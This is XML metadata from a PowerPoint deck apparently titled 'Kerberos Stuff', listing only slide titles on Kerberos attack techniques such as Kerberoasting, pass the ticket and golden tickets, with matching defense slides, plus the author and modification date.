      <vt:lpstr>What happens if we present an invalid username?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Username Enumeration</vt:lpstr>
      <vt:lpstr>Username Enumeration</vt:lpstr>
      <vt:lpstr>Username Enumeration: Defense</vt:lpstr>
      <vt:lpstr>Part 2: Intercepting AS-REQ</vt:lpstr>
      <vt:lpstr>Intercepting AS-REQ</vt:lpstr>
      <vt:lpstr>Intercept AS-REQ </vt:lpstr>
      <vt:lpstr>Intercept AS_REQ: Defense</vt:lpstr>
      <vt:lpstr>Part 3: No Preauthentication Required</vt:lpstr>
      <vt:lpstr>No Preauthentication Required</vt:lpstr>
      <vt:lpstr>No Preauthentication Required</vt:lpstr>
      <vt:lpstr>No Preauthentication Required</vt:lpstr>
      <vt:lpstr>No Preauthentication Required: Defense</vt:lpstr>
      <vt:lpstr>PArt 4: Kerbroasting</vt:lpstr>
      <vt:lpstr>Kerbroasting</vt:lpstr>
      <vt:lpstr>kERBROASTING</vt:lpstr>
      <vt:lpstr>Kerbroasting</vt:lpstr>
      <vt:lpstr>Kerbroasting</vt:lpstr>
      <vt:lpstr>Kerbroasting: Defense</vt:lpstr>
      <vt:lpstr>Part 5: MS14-068 Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege </vt:lpstr>
      <vt:lpstr>MS14-068</vt:lpstr>
      <vt:lpstr>MS14-068</vt:lpstr>
      <vt:lpstr>MS14-068: Defense</vt:lpstr>
      <vt:lpstr>Apart: A quick word about credentials in Memory</vt:lpstr>
      <vt:lpstr>A quick word about credentials in memory </vt:lpstr>
      <vt:lpstr>Part 6: Abusing Tickets From Memory</vt:lpstr>
      <vt:lpstr>Dumping Tickets from Memory</vt:lpstr>
      <vt:lpstr>Cracking Dumped Tickets</vt:lpstr>
      <vt:lpstr>Pass The Ticket</vt:lpstr>
      <vt:lpstr>Pass the Ticket</vt:lpstr>
      <vt:lpstr>Pass the Ticket</vt:lpstr>
      <vt:lpstr>Part 7: Over pass the Hash (AKA Pass The Key)</vt:lpstr>
      <vt:lpstr>Over Pass The Hash</vt:lpstr>
      <vt:lpstr>Part 8: Silver Ticket </vt:lpstr>
      <vt:lpstr>Silver Ticket</vt:lpstr>
      <vt:lpstr>Silver Ticket: Defence</vt:lpstr>
      <vt:lpstr>Part 9: Golden Ticket</vt:lpstr>
      <vt:lpstr>Golden Ticket</vt:lpstr>
      <vt:lpstr>Golden Ticket: Defence </vt:lpstr>
      <vt:lpstr>Part 10: Kerberos Delegation</vt:lpstr>
      <vt:lpstr>Delegation</vt:lpstr>
      <vt:lpstr>Delegation</vt:lpstr>
      <vt:lpstr>Delegation</vt:lpstr>
      <vt:lpstr>Unconstrained Delegation</vt:lpstr>
      <vt:lpstr>Unconstrained Delegation</vt:lpstr>
      <vt:lpstr>Constrained Delegation</vt:lpstr>
      <vt:lpstr>Protocol Transition</vt:lpstr>
      <vt:lpstr>Constrained Delegation</vt:lpstr>
      <vt:lpstr>Constrained Delegation</vt:lpstr>
      <vt:lpstr>Delegation: Defense</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Kerberos Stuff</dc:title>
  <dc:creator>MORT</dc:creator>
  <cp:lastModifiedBy>Oliver Morton</cp:lastModifiedBy>
  <cp:revision>92</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-12T19:24:44Z</dcterms:modified>
</cp:coreProperties>
</file>